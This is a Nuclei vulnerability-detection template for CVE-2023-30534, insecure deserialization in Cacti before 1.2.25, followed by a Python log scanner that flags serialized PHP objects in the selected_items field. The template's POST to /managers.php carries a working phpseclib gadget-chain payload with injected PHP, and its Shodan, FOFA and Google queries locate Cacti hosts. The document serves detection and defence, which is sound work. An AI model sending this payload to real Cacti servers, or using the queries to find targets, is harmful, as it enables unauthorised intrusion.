Cacti < 1.2.25 Insecure Deserialization
ID: CVE-2023-30534
Severity: medium
Author: k0pak4
Tags: cve,cve2023,cacti,authenticated
Description
Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.
YAML Source
id: CVE-2023-30534

info:
  name: Cacti < 1.2.25 Insecure Deserialization
  author: k0pak4
  severity: medium
  description: |
    Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.
  remediation: This issue has been addressed in version 1.2.25.
  reference:
    - https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30534
    - https://www.fastly.com/blog/cve-2023-30534-insecure-deserialization-in-cacti-prior-to-1-2-25
    - https://lists.fedoraproject.org/archives/list/[email protected]/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/
    - https://lists.fedoraproject.org/archives/list/[email protected]/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2023-30534
    cwe-id: CWE-502
    epss-score: 0.09326
    epss-percentile: 0.94688
    cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: cacti
    product: cacti
    shodan-query:
      - title:"Cacti"
      - http.title:"login to cacti"
      - http.title:"cacti"
      - http.favicon.hash:"-1797138069"
    fofa-query:
      - icon_hash="-1797138069"
      - title="cacti"
      - title="login to cacti"
    google-query:
      - intitle:"cacti"
      - intitle:"login to cacti"
  tags: cve,cve2023,cacti,authenticated

http:
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}
      - |
        POST /managers.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}
      - |
        GET /clog.php HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body_4
        regex:
          - "<table[^;]*;['\"]>\\s*(<tr class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf_token
        part: body
        group: 1
        regex:
          - "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"
        internal: true
# digest: 4a0a0047304502205779d8cacc5f17ed58393019973a9a45a48b3cfb1a25855ff45a418df488a8da022100bc5d611c9ab4ab9e19215d3385b02984f8ce910412a01c0d691a4d6586ba0715:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-30534.yaml"
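
A defender-side counterpart to the template's POST to /managers.php, as an added example that is not part of the template or of Cacti: it decodes the selected_items form field from logged request bodies and flags values that carry serialized PHP objects. The function names and the sample requests are constructed for illustration, and the check assumes a legitimate selected_items value is a flat serialized array of integers.

```python
import re
from urllib.parse import parse_qs

# serialize() tokens that make unserialize() instantiate a class:
# O:<len>:"Name" (object) and C:<len>:"Name" (custom-serialized object).
OBJECT_TOKEN = re.compile(r'(?:^|[;{])[OC]:\d+:"([^"]+)"')
# Assumption: a legitimate value is a flat serialized array of integers.
INT_ARRAY = re.compile(r'a:\d+:\{(?:i:\d+;i:\d+;)*\}')

def inspect_body(body, param="selected_items"):
    """Return (verdict, class_names) for one form-encoded POST body."""
    values = parse_qs(body, keep_blank_values=True).get(param)
    if not values:
        return "absent", []
    classes = [c for v in values for c in OBJECT_TOKEN.findall(v)]
    if classes:
        return "object", classes
    if all(INT_ARRAY.fullmatch(v) for v in values):
        return "int-array", []
    return "unexpected", []

def scan(requests, path="/managers.php"):
    """Return (index, verdict, classes) for POSTs to `path` whose field is not a plain int array."""
    findings = []
    for i, (method, req_path, body) in enumerate(requests):
        if method != "POST" or req_path.split("?")[0] != path:
            continue
        verdict, classes = inspect_body(body)
        if verdict in ("object", "unexpected"):
            findings.append((i, verdict, classes))
    return findings

# Constructed sample traffic (method, path, body); not captured from a real system.
SAMPLE = [
    ("GET", "/index.php", ""),
    ("POST", "/managers.php",
     "action=actions&selected_items=a%3A2%3A%7Bi%3A0%3Bi%3A7%3Bi%3A1%3Bi%3A9%3B%7D&drp_action=2"),
    ("POST", "/managers.php",
     "action=actions&selected_items=a%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A0%3A%7B%7D%7D&drp_action=2"),
    ("POST", "/managers.php", "action=actions&selected_items=not-serialized&drp_action=2"),
]

if __name__ == "__main__":
    for idx, verdict, classes in scan(SAMPLE):
        print(idx, verdict, classes)
```

The object-token pattern can also fire on a string value that merely contains such text, so treat a hit as a prompt to review the request and the matching unserialize entry in the Cacti log.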